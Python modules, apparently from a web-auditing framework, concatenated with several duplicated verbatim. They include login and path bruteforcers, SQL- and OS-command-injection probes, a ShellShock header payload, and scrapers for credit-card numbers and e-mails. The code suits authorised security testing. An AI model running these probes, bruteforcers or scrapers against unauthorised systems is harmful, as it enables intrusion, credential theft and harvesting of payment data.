def module_run(self):
    """Request every wordlist entry under the base URL via self.thread().

    Options read: host, port, method, wordlist, url_path.  The wordlist
    path is passed through self.check() before it is read, and each line
    becomes one candidate URL handed to self.thread() with the method.
    """
    test('Starting bruteforce...')
    host = self.options['host']
    port = self.options['port']
    method = self.options['method']
    wordlist = self.options['wordlist']
    url_path = self.options['url_path']
    base_url = check_url(check_end(host, url_path), port)
    for entry in readfile(self.check(wordlist)):
        candidate = check_end(base_url, entry)
        self.thread(candidate, method)
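def module_run(self):
    """Check for an exposed ASP.NET trace viewer (trace.axd).

    Requests trace.axd and Trace.axd under the base URL and reports the
    first 200 response whose body contains the "Application Trace" title.
    Options read: host, port, data, method, url_path.

    Fix: the original reassigned `url` inside the loop, so the second probe
    was appended to the first (.../trace.axd/Trace.axd) instead of to the
    base URL.
    """
    test('Scanning...')
    host = self.options['host']
    port = self.options['port']
    data = self.options['data']
    method = self.options['method']
    url_path = self.options['url_path']
    base_url = check_url(check_end(host, url_path), port)
    # Both casings are probed; the first hit ends the scan.
    for path in ['trace.axd', 'Trace.axd']:
        url = check_end(base_url, path)
        resp = self.request(url=url, method=method, data=data)
        if resp.code != 200:
            continue
        # NOTE(review): assumes resp.content is str; a bytes body would make
        # re.search raise TypeError — confirm against self.request.
        if re.search(r'<td><h1>Application Trace</h1></td>', resp.content, re.I):
            plus('ASP.NET trace was found: %s' % (resp.url))
            return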
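def module_run(self):
    """Probe request parameters for an echoed OS-command-injection marker.

    Each wordlist payload has its '[PAYLOAD]' marker replaced by a random
    string; the payload is substituted into the URL (GET) or into the
    URL/body variants (POST) and a hit is reported when the random string
    appears in the response body.  The scan stops at the first hit.

    Options read: host, port, data, method, url_path, wordlist.  An empty
    or unset wordlist falls back to data_path/os_command_injection.galileo.

    Fixes against the original: the fallback test compared against
    ('' or None), which evaluates to None, so an empty wordlist string was
    never replaced; the POST loop variable shadowed `data`, so every
    payload after the first was built from the previous iteration's body
    variant; Replace(...).run() was evaluated twice per payload; and the
    marker is now searched literally (re.escape) in case rand_all() emits
    regex metacharacters.
    """
    path = os.path.join(self.data_path, 'os_command_injection.galileo')
    test('Injecting...')
    host = self.options['host']
    port = self.options['port']
    data = self.options['data']
    method = self.options['method']
    url_path = self.options['url_path']
    chosen_wordlist = self.options['wordlist']
    wordlist = chosen_wordlist if chosen_wordlist not in ('', None) else path
    url = check_url(check_end(host, url_path), port)
    for payload in readfile(wordlist):
        random_string = rand_all(20)
        payload = payload.replace('[PAYLOAD]', random_string)
        marker = re.escape(random_string)
        if method == 'GET':
            for url_ in Replace(url, payload, data).run():
                # Echoes each probe URL as it is tried (kept from the original).
                print(url_)
                resp = self.request(url=url_, method=method, data=data)
                # NOTE(review): assumes resp.content is str — confirm.
                if re.search(marker, resp.content, re.I):
                    plus('OS Command Vulnerability was found: %s' % (resp.url))
                    return
        elif method == 'POST':
            # Looks like run() returns [url, body1, body2, ...] for POST —
            # confirm against Replace.  Computed once per payload.
            variants = Replace(url, payload, data).run()
            for url_ in variants[:1]:
                for post_data in variants[1:]:
                    resp = self.request(url=url_, method=method, data=post_data)
                    if re.search(marker, resp.content, re.I):
                        plus('OS Command Vulnerability was found:\n \_ URL => %s\n \_ DATA => %s' % (resp.url, post_data))
                        return
        else:
            return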
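def module_run(self):
    """Check for an exposed ASP.NET trace viewer (trace.axd).

    Requests trace.axd and Trace.axd under the base URL and reports the
    first 200 response whose body contains the "Application Trace" title.
    Options read: host, port, data, method, url_path.

    Fix: the original reassigned `url` inside the loop, so the second probe
    was appended to the first (.../trace.axd/Trace.axd) instead of to the
    base URL.
    """
    test('Scanning...')
    host = self.options['host']
    port = self.options['port']
    data = self.options['data']
    method = self.options['method']
    url_path = self.options['url_path']
    base_url = check_url(check_end(host, url_path), port)
    # Both casings are probed; the first hit ends the scan.
    for path in ['trace.axd', 'Trace.axd']:
        url = check_end(base_url, path)
        resp = self.request(url=url, method=method, data=data)
        if resp.code != 200:
            continue
        # NOTE(review): assumes resp.content is str; a bytes body would make
        # re.search raise TypeError — confirm against self.request.
        if re.search(r'<td><h1>Application Trace</h1></td>', resp.content, re.I):
            plus('ASP.NET trace was found: %s' % (resp.url))
            return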
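def module_run(self):
    """Probe request parameters for error-based SQL injection.

    Each wordlist payload is substituted into the URL (GET) or into the
    URL/body variants (POST); the response body is passed to sql_error()
    and the first (dbms, error) hit is reported, ending the scan.

    Options read: host, port, data, method, url_path, wordlist.  An empty
    or unset wordlist falls back to data_path/sql_injection.galileo.

    Fixes against the original: the fallback test compared against
    ('' or None), which evaluates to None, so an empty wordlist string was
    never replaced; the POST loop variable shadowed `data`, so every
    payload after the first was built from the previous iteration's body
    variant; and Replace(...).run() was evaluated twice per payload.
    """
    path = os.path.join(self.data_path, 'sql_injection.galileo')
    test('Injecting...')
    host = self.options['host']
    port = self.options['port']
    data = self.options['data']
    method = self.options['method']
    url_path = self.options['url_path']
    chosen_wordlist = self.options['wordlist']
    wordlist = chosen_wordlist if chosen_wordlist not in ('', None) else path
    url = check_url(check_end(host, url_path), port)
    for payload in readfile(wordlist):
        if method == 'GET':
            for url_ in Replace(url, payload, data).run():
                resp = self.request(url=url_, method=method, data=data)
                name, error = sql_error(resp.content)
                if name and error:
                    plus('SQL Injection was found: %s' % (resp.url))
                    print(' \_ DBMS => %s\n \_ ERROR => %s' % (name, error))
                    return
        elif method == 'POST':
            # Looks like run() returns [url, body1, body2, ...] for POST —
            # confirm against Replace.  Computed once per payload.
            variants = Replace(url, payload, data).run()
            for url_ in variants[:1]:
                for post_data in variants[1:]:
                    resp = self.request(url=url_, method=method, data=post_data)
                    name, error = sql_error(resp.content)
                    if name and error:
                        plus('SQL Injection was found: %s' % (resp.url))
                        print(' \_ DATA => %s\n \_ NAME => %s\n \_ ERROR => %s' % (post_data, name, error))
                        return
        else:
            return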
def module_run(self):
    """Bruteforce backup copies of every wordlist path.

    For each wordlist entry, every suffix from the 'exts' option (via
    self.to_dict) — or from the built-in backup-suffix list when 'exts'
    is None — is appended and the resulting URL is handed to self.thread().
    Options read: host, port, method, wordlist, url_path, exts.
    """
    test('Starting bruteforce...')
    default_suffixes = [
        ' (copy)/', '_copy/', '- Copy/', '~/', '.7z',
        '.gz', '.tar.gz', '.tar', '.tar.7z', '.tar.bz2', '.bak',
        '.old', '.zip', '.rar', '.bac', '_old', '_bak', '_backup', '1', '2', '3',
    ]
    host = self.options['host']
    port = self.options['port']
    method = self.options['method']
    wordlist = self.options['wordlist']
    url_path = self.options['url_path']
    exts_option = self.options['exts']
    if exts_option is not None:
        suffixes = self.to_dict(exts_option)
    else:
        suffixes = default_suffixes
    base_url = check_url(check_end(host, url_path), port)
    for entry in readfile(self.check(wordlist)):
        for suffix in suffixes:
            candidate = check_end(base_url, entry + suffix)
            self.thread(candidate, method)
def module_run(self):
    """Report the 'server' response header, trying several HTTP methods.

    GET, HEAD, BLABLA (not a real HTTP method), OPTIONS and DELETE are sent
    in turn; the first response carrying a 'server' header is printed and
    the scan stops.  Options read: host, port, url_path.
    """
    test('Detecting...')
    host = self.options['host']
    port = self.options['port']
    url_path = self.options['url_path']
    url = check_url(check_end(host, url_path), port)
    for verb in ('GET', 'HEAD', 'BLABLA', 'OPTIONS', 'DELETE'):
        resp = self.request(url=url, method=verb)
        # NOTE(review): the lookup is for the lower-case key only; assumes
        # self.request normalises header names — confirm.
        if 'server' in resp.headers:
            plus('Detect Server: %s' % (resp.headers['server']))
            return
def module_run(self):
    """Submit every (user, password) pair from the two wordlists to self.thread().

    Options read: host, port, method, wpass, wuser, url_path.  Both list
    paths go through self.check() before being read.  Note the password
    list is re-read from disk for every user, as in the original.
    """
    test('Starting bruteforce...')
    host = self.options['host']
    port = self.options['port']
    method = self.options['method']
    wpass = self.options['wpass']
    wuser = self.options['wuser']
    url_path = self.options['url_path']
    target = check_url(check_end(host, url_path), port)
    for user in readfile(self.check(wuser)):
        for passwd in readfile(self.check(wpass)):
            self.thread(target, method, user, passwd)
def module_run(self):
    """Submit every (user, password) pair from the two wordlists to self.thread().

    Options read: host, port, method, wpass, wuser, url_path.  Both list
    paths go through self.check() before being read.  Note the password
    list is re-read from disk for every user, as in the original.
    """
    test('Starting bruteforce...')
    host = self.options['host']
    port = self.options['port']
    method = self.options['method']
    wpass = self.options['wpass']
    wuser = self.options['wuser']
    url_path = self.options['url_path']
    target = check_url(check_end(host, url_path), port)
    for user in readfile(self.check(wuser)):
        for passwd in readfile(self.check(wpass)):
            self.thread(target, method, user, passwd)
def module_run(self):
    """Detect a CMS by running the drupal/joomla/wordpress checkers on one response.

    Each checker is looked up on self by name and called with the response
    headers and body; the first truthy result is reported and the scan
    ends.  Options read: host, port, data, method, url_path.
    """
    test('Detecting...')
    host = self.options['host']
    port = self.options['port']
    data = self.options['data']
    method = self.options['method']
    url_path = self.options['url_path']
    url = check_url(check_end(host, url_path), port)
    resp = self.request(url=url, method=method, data=data)
    for cms_name in ('drupal', 'joomla', 'wordpress'):
        checker = getattr(self, cms_name)
        if checker(resp.headers, resp.content):
            plus('Found %s cms' % (cms_name.title()))
            return
def module_run(self):
    """Detect a CMS by running the drupal/joomla/wordpress checkers on one response.

    Each checker is looked up on self by name and called with the response
    headers and body; the first truthy result is reported and the scan
    ends.  Options read: host, port, data, method, url_path.
    """
    test('Detecting...')
    host = self.options['host']
    port = self.options['port']
    data = self.options['data']
    method = self.options['method']
    url_path = self.options['url_path']
    url = check_url(check_end(host, url_path), port)
    resp = self.request(url=url, method=method, data=data)
    for cms_name in ('drupal', 'joomla', 'wordpress'):
        checker = getattr(self, cms_name)
        if checker(resp.headers, resp.content):
            plus('Found %s cms' % (cms_name.title()))
            return
def module_run(self):
    """Report a source-code disclosure when source_code() recognises the body.

    source_code(resp.code, resp.content) returns a (flag, language) pair;
    only the case where both are truthy is reported, via plus2().  Options
    read: host, port, data, method, regexp, url_path ('regexp' is read but
    unused in this module).
    """
    test('Searching...')
    host = self.options['host']
    port = self.options['port']
    data = self.options['data']
    method = self.options['method']
    regexp = self.options['regexp']  # unused in this module
    url_path = self.options['url_path']
    url = check_url(check_end(host, url_path), port)
    resp = self.request(url=url, method=method, data=data)
    disclosed, language = source_code(resp.code, resp.content)
    # Every other (flag, language) combination is silent.
    if disclosed and language:
        plus2('Code disclosure vulnerability was found in: %s' % (resp.url))
def module_run(self):
    """Report a source-code disclosure when source_code() recognises the body.

    source_code(resp.code, resp.content) returns a (flag, language) pair;
    only the case where both are truthy is reported, via plus2().  Options
    read: host, port, data, method, regexp, url_path ('regexp' is read but
    unused in this module).
    """
    test('Searching...')
    host = self.options['host']
    port = self.options['port']
    data = self.options['data']
    method = self.options['method']
    regexp = self.options['regexp']  # unused in this module
    url_path = self.options['url_path']
    url = check_url(check_end(host, url_path), port)
    resp = self.request(url=url, method=method, data=data)
    disclosed, language = source_code(resp.code, resp.content)
    # Every other (flag, language) combination is silent.
    if disclosed and language:
        plus2('Code disclosure vulnerability was found in: %s' % (resp.url))
def module_run(self):
    """Detect a web framework by running the per-framework checkers on one response.

    Each name in the framework list is resolved to a method on self and
    called with the response headers and body; the first truthy result is
    reported using that method's docstring as the display name, then the
    scan ends.  Options read: host, port, data, method, url_path — note
    that method and data are read but not forwarded to self.request().
    """
    test('Detecting...')
    host = self.options['host']
    port = self.options['port']
    data = self.options['data']
    method = self.options['method']
    url_path = self.options['url_path']
    url = check_url(check_end(host, url_path), port)
    resp = self.request(url=url)
    # Names must match the checker methods defined on self ('larvel' is the
    # spelling the method uses).
    framework_names = (
        'mvc', 'cakephp', 'cherrypy', 'django', 'flask',
        'fuelphp', 'larvel', 'grails', 'nette', 'rails', 'symfony',
    )
    for name in framework_names:
        checker = getattr(self, name)
        if checker(resp.headers, resp.content):
            plus('Found %s Framework' % (checker.__doc__))
            return
def module_run(self):
    """Detect a web framework by running the per-framework checkers on one response.

    Each name in the framework list is resolved to a method on self and
    called with the response headers and body; the first truthy result is
    reported using that method's docstring as the display name, then the
    scan ends.  Options read: host, port, data, method, url_path — note
    that method and data are read but not forwarded to self.request().
    """
    test('Detecting...')
    host = self.options['host']
    port = self.options['port']
    data = self.options['data']
    method = self.options['method']
    url_path = self.options['url_path']
    url = check_url(check_end(host, url_path), port)
    resp = self.request(url=url)
    # Names must match the checker methods defined on self ('larvel' is the
    # spelling the method uses).
    framework_names = (
        'mvc', 'cakephp', 'cherrypy', 'django', 'flask',
        'fuelphp', 'larvel', 'grails', 'nette', 'rails', 'symfony',
    )
    for name in framework_names:
        checker = getattr(self, name)
        if checker(resp.headers, resp.content):
            plus('Found %s Framework' % (checker.__doc__))
            return
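def module_run(self):
    """Probe request parameters for an echoed OS-command-injection marker.

    Each wordlist payload has its '[PAYLOAD]' marker replaced by a random
    string; the payload is substituted into the URL (GET) or into the
    URL/body variants (POST) and a hit is reported when the random string
    appears in the response body.  The scan stops at the first hit.

    Options read: host, port, data, method, url_path, wordlist.  An empty
    or unset wordlist falls back to data_path/os_command_injection.galileo.

    Fixes against the original: the fallback test compared against
    ('' or None), which evaluates to None, so an empty wordlist string was
    never replaced; the POST loop variable shadowed `data`, so every
    payload after the first was built from the previous iteration's body
    variant; Replace(...).run() was evaluated twice per payload; and the
    marker is now searched literally (re.escape) in case rand_all() emits
    regex metacharacters.
    """
    path = os.path.join(self.data_path, 'os_command_injection.galileo')
    test('Injecting...')
    host = self.options['host']
    port = self.options['port']
    data = self.options['data']
    method = self.options['method']
    url_path = self.options['url_path']
    chosen_wordlist = self.options['wordlist']
    wordlist = chosen_wordlist if chosen_wordlist not in ('', None) else path
    url = check_url(check_end(host, url_path), port)
    for payload in readfile(wordlist):
        random_string = rand_all(20)
        payload = payload.replace('[PAYLOAD]', random_string)
        marker = re.escape(random_string)
        if method == 'GET':
            for url_ in Replace(url, payload, data).run():
                # Echoes each probe URL as it is tried (kept from the original).
                print(url_)
                resp = self.request(url=url_, method=method, data=data)
                # NOTE(review): assumes resp.content is str — confirm.
                if re.search(marker, resp.content, re.I):
                    plus('OS Command Vulnerability was found: %s' % (resp.url))
                    return
        elif method == 'POST':
            # Looks like run() returns [url, body1, body2, ...] for POST —
            # confirm against Replace.  Computed once per payload.
            variants = Replace(url, payload, data).run()
            for url_ in variants[:1]:
                for post_data in variants[1:]:
                    resp = self.request(url=url_, method=method, data=post_data)
                    if re.search(marker, resp.content, re.I):
                        plus('OS Command Vulnerability was found:\n \_ URL => %s\n \_ DATA => %s' % (resp.url, post_data))
                        return
        else:
            return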
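def module_run(self):
    """Search the response body for credit-card-number patterns.

    With no 'regexp' option set, each built-in issuer pattern is tried and
    every match is printed as '<issuer> => <match>'; otherwise the
    user-supplied regex is used and matches are printed as
    'Found REGEX => <match>'.  A regex that fails to compile is reported
    via warn().  Options read: host, port, data, regexp, method, url_path.

    Fixes against the original: the custom-regex branch printed an
    undefined name `x` (NameError on the first match); `== ('' or None)`
    only tested for None, so an empty string fell through to
    re.findall(''); re.error has no `.message` attribute on Python 3; and
    the American Express pattern used `[34|37]`, a character class, where
    the prefix `3[47]` was meant.
    """
    # https://stackoverflow.com/questions/9315647/regex-credit-card-number-tests
    cc_regex = {
        'American Express': r'^3[47][0-9]{13}$',
        'Mastercard': r'^(?:5[1-5][0-9]{2}|222[1-9]|22[3-9][0-9]|2[3-6][0-9]{2}|27[01][0-9]|2720)[0-9]{12}$',
        'Visa Card': r'^4[0-9]{12}(?:[0-9]{3})?$',
        'Visa Master Card': r'^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$',
    }
    # NOTE(review): these patterns are anchored with ^/$ and searched without
    # re.M, so they only match a body that consists of exactly one number —
    # confirm that is the intended behaviour.
    test('Searching...')
    host = self.options['host']
    port = self.options['port']
    data = self.options['data']
    regexp = self.options['regexp']
    method = self.options['method']
    url_path = self.options['url_path']
    url = check_url(check_end(host, url_path), port)
    resp = self.request(url=url, method=method, data=data)
    try:
        if regexp in ('', None):
            found_any = False
            for issuer, pattern in cc_regex.items():
                # NOTE(review): assumes resp.content is str — confirm.
                for match in re.findall(pattern, resp.content, re.I):
                    found_any = True
                    print('%s => %s' % (issuer, match))
            if not found_any:
                info('Not found credit cards...')
        else:
            found_cc = re.findall(regexp, resp.content, re.I)
            if found_cc:
                for match in found_cc:
                    print('Found REGEX => %s' % (match))
            else:
                info('Not found credit cards...')
    except re.error as e:
        warn(str(e))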
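def module_run(self):
    """Probe request parameters for error-based SQL injection.

    Each wordlist payload is substituted into the URL (GET) or into the
    URL/body variants (POST); the response body is passed to sql_error()
    and the first (dbms, error) hit is reported, ending the scan.

    Options read: host, port, data, method, url_path, wordlist.  An empty
    or unset wordlist falls back to data_path/sql_injection.galileo.

    Fixes against the original: the fallback test compared against
    ('' or None), which evaluates to None, so an empty wordlist string was
    never replaced; the POST loop variable shadowed `data`, so every
    payload after the first was built from the previous iteration's body
    variant; and Replace(...).run() was evaluated twice per payload.
    """
    path = os.path.join(self.data_path, 'sql_injection.galileo')
    test('Injecting...')
    host = self.options['host']
    port = self.options['port']
    data = self.options['data']
    method = self.options['method']
    url_path = self.options['url_path']
    chosen_wordlist = self.options['wordlist']
    wordlist = chosen_wordlist if chosen_wordlist not in ('', None) else path
    url = check_url(check_end(host, url_path), port)
    for payload in readfile(wordlist):
        if method == 'GET':
            for url_ in Replace(url, payload, data).run():
                resp = self.request(url=url_, method=method, data=data)
                name, error = sql_error(resp.content)
                if name and error:
                    plus('SQL Injection was found: %s' % (resp.url))
                    print(' \_ DBMS => %s\n \_ ERROR => %s' % (name, error))
                    return
        elif method == 'POST':
            # Looks like run() returns [url, body1, body2, ...] for POST —
            # confirm against Replace.  Computed once per payload.
            variants = Replace(url, payload, data).run()
            for url_ in variants[:1]:
                for post_data in variants[1:]:
                    resp = self.request(url=url_, method=method, data=post_data)
                    name, error = sql_error(resp.content)
                    if name and error:
                        plus('SQL Injection was found: %s' % (resp.url))
                        print(' \_ DATA => %s\n \_ NAME => %s\n \_ ERROR => %s' % (post_data, name, error))
                        return
        else:
            return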
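def module_run(self):
    """Print every e-mail address found in the response body.

    Uses the 'regexp' option when set, otherwise a default e-mail pattern.
    A regex that fails to compile is reported via warn().  Options read:
    host, port, data, regexp, method, url_path.

    Fixes against the original: `!= ('' or None)` only tested for None, so
    an empty 'regexp' option was used as the pattern instead of the
    default; and re.error has no `.message` attribute on Python 3.
    """
    # https://www.regular-expressions.info/email.html
    default_pattern = r'[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,}'
    test('Searching...')
    host = self.options['host']
    port = self.options['port']
    data = self.options['data']
    custom_pattern = self.options['regexp']
    regexp = custom_pattern if custom_pattern not in ('', None) else default_pattern
    method = self.options['method']
    url_path = self.options['url_path']
    url = check_url(check_end(host, url_path), port)
    resp = self.request(url=url, method=method, data=data)
    try:
        # NOTE(review): assumes resp.content is str — confirm.
        found_email = re.findall(regexp, resp.content, re.I)
    except re.error as e:
        warn(str(e))
        return
    if not found_email:
        info('Not found emails...')
        return
    for email in found_email:
        print('Email => %s' % (email))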
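def module_run(self):
    """Print every dotted-quad IP address found in the response body.

    Uses the 'regexp' option when set, otherwise a default dotted-quad
    pattern.  A regex that fails to compile is reported via warn().
    Options read: host, port, data, regexp, method, url_path.

    Fixes against the original: `!= ('' or None)` only tested for None, so
    an empty 'regexp' option was used as the pattern instead of the
    default; and re.error has no `.message` attribute on Python 3.
    """
    # https://www.regular-expressions.info/ip.html
    # NOTE(review): this matches any four dot-separated digit groups, not
    # only RFC 1918 ranges, despite the 'Private IP' label — confirm intent.
    default_pattern = r'[0-9]+(?:\.[0-9]+){3}'
    test('Searching...')
    host = self.options['host']
    port = self.options['port']
    data = self.options['data']
    custom_pattern = self.options['regexp']
    regexp = custom_pattern if custom_pattern not in ('', None) else default_pattern
    method = self.options['method']
    url_path = self.options['url_path']
    url = check_url(check_end(host, url_path), port)
    resp = self.request(url=url, method=method, data=data)
    try:
        # NOTE(review): assumes resp.content is str — confirm.
        found_ip = re.findall(regexp, resp.content, re.I)
    except re.error as e:
        warn(str(e))
        return
    if not found_ip:
        info('Not found private ip...')
        return
    for ip in found_ip:
        print('Private IP => %s' % (ip))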
def module_run(self):
    """Send one request carrying the ShellShock probe string and report an echo.

    The probe (with a random marker) is placed in the User-Agent, Cookie
    and Referer headers; a hit is reported only for a 200 response whose
    body contains the marker.  Any other outcome is silent.  Options read:
    host, port, data, method, url_path.
    """
    marker = rand_str(30)
    probe = '() { :;}; echo; echo; echo %s' % (marker)
    test('Exploiting...')
    host = self.options['host']
    port = self.options['port']
    data = self.options['data']
    method = self.options['method']
    url_path = self.options['url_path']
    headers = {
        'User-Agent': probe,
        'Cookie': probe,
        'Referer': probe,
    }
    url = check_url(check_end(host, url_path), port)
    resp = self.request(url=url, method=method, data=data, headers=headers)
    # NOTE(review): assumes resp.content is str — confirm.
    if resp.code == 200 and re.search(marker, resp.content, re.I):
        plus('ShellShock was found in: %s' % (resp.url))
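def module_run(self):
    """Print every e-mail address found in the response body.

    Uses the 'regexp' option when set, otherwise a default e-mail pattern.
    A regex that fails to compile is reported via warn().  Options read:
    host, port, data, regexp, method, url_path.

    Fixes against the original: `!= ('' or None)` only tested for None, so
    an empty 'regexp' option was used as the pattern instead of the
    default; and re.error has no `.message` attribute on Python 3.
    """
    # https://www.regular-expressions.info/email.html
    default_pattern = r'[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,}'
    test('Searching...')
    host = self.options['host']
    port = self.options['port']
    data = self.options['data']
    custom_pattern = self.options['regexp']
    regexp = custom_pattern if custom_pattern not in ('', None) else default_pattern
    method = self.options['method']
    url_path = self.options['url_path']
    url = check_url(check_end(host, url_path), port)
    resp = self.request(url=url, method=method, data=data)
    try:
        # NOTE(review): assumes resp.content is str — confirm.
        found_email = re.findall(regexp, resp.content, re.I)
    except re.error as e:
        warn(str(e))
        return
    if not found_email:
        info('Not found emails...')
        return
    for email in found_email:
        print('Email => %s' % (email))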
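def module_run(self):
    """Print every dotted-quad IP address found in the response body.

    Uses the 'regexp' option when set, otherwise a default dotted-quad
    pattern.  A regex that fails to compile is reported via warn().
    Options read: host, port, data, regexp, method, url_path.

    Fixes against the original: `!= ('' or None)` only tested for None, so
    an empty 'regexp' option was used as the pattern instead of the
    default; and re.error has no `.message` attribute on Python 3.
    """
    # https://www.regular-expressions.info/ip.html
    # NOTE(review): this matches any four dot-separated digit groups, not
    # only RFC 1918 ranges, despite the 'Private IP' label — confirm intent.
    default_pattern = r'[0-9]+(?:\.[0-9]+){3}'
    test('Searching...')
    host = self.options['host']
    port = self.options['port']
    data = self.options['data']
    custom_pattern = self.options['regexp']
    regexp = custom_pattern if custom_pattern not in ('', None) else default_pattern
    method = self.options['method']
    url_path = self.options['url_path']
    url = check_url(check_end(host, url_path), port)
    resp = self.request(url=url, method=method, data=data)
    try:
        # NOTE(review): assumes resp.content is str — confirm.
        found_ip = re.findall(regexp, resp.content, re.I)
    except re.error as e:
        warn(str(e))
        return
    if not found_ip:
        info('Not found private ip...')
        return
    for ip in found_ip:
        print('Private IP => %s' % (ip))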
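def module_run(self):
    """Search the response body for credit-card-number patterns.

    With no 'regexp' option set, each built-in issuer pattern is tried and
    every match is printed as '<issuer> => <match>'; otherwise the
    user-supplied regex is used and matches are printed as
    'Found REGEX => <match>'.  A regex that fails to compile is reported
    via warn().  Options read: host, port, data, regexp, method, url_path.

    Fixes against the original: the custom-regex branch printed an
    undefined name `x` (NameError on the first match); `== ('' or None)`
    only tested for None, so an empty string fell through to
    re.findall(''); re.error has no `.message` attribute on Python 3; and
    the American Express pattern used `[34|37]`, a character class, where
    the prefix `3[47]` was meant.
    """
    # https://stackoverflow.com/questions/9315647/regex-credit-card-number-tests
    cc_regex = {
        'American Express': r'^3[47][0-9]{13}$',
        'Mastercard': r'^(?:5[1-5][0-9]{2}|222[1-9]|22[3-9][0-9]|2[3-6][0-9]{2}|27[01][0-9]|2720)[0-9]{12}$',
        'Visa Card': r'^4[0-9]{12}(?:[0-9]{3})?$',
        'Visa Master Card': r'^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$',
    }
    # NOTE(review): these patterns are anchored with ^/$ and searched without
    # re.M, so they only match a body that consists of exactly one number —
    # confirm that is the intended behaviour.
    test('Searching...')
    host = self.options['host']
    port = self.options['port']
    data = self.options['data']
    regexp = self.options['regexp']
    method = self.options['method']
    url_path = self.options['url_path']
    url = check_url(check_end(host, url_path), port)
    resp = self.request(url=url, method=method, data=data)
    try:
        if regexp in ('', None):
            found_any = False
            for issuer, pattern in cc_regex.items():
                # NOTE(review): assumes resp.content is str — confirm.
                for match in re.findall(pattern, resp.content, re.I):
                    found_any = True
                    print('%s => %s' % (issuer, match))
            if not found_any:
                info('Not found credit cards...')
        else:
            found_cc = re.findall(regexp, resp.content, re.I)
            if found_cc:
                for match in found_cc:
                    print('Found REGEX => %s' % (match))
            else:
                info('Not found credit cards...')
    except re.error as e:
        warn(str(e))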
def module_run(self):
    """Send one request carrying the ShellShock probe string and report an echo.

    The probe (with a random marker) is placed in the User-Agent, Cookie
    and Referer headers; a hit is reported only for a 200 response whose
    body contains the marker.  Any other outcome is silent.  Options read:
    host, port, data, method, url_path.
    """
    marker = rand_str(30)
    probe = '() { :;}; echo; echo; echo %s' % (marker)
    test('Exploiting...')
    host = self.options['host']
    port = self.options['port']
    data = self.options['data']
    method = self.options['method']
    url_path = self.options['url_path']
    headers = {
        'User-Agent': probe,
        'Cookie': probe,
        'Referer': probe,
    }
    url = check_url(check_end(host, url_path), port)
    resp = self.request(url=url, method=method, data=data, headers=headers)
    # NOTE(review): assumes resp.content is str — confirm.
    if resp.code == 200 and re.search(marker, resp.content, re.I):
        plus('ShellShock was found in: %s' % (resp.url))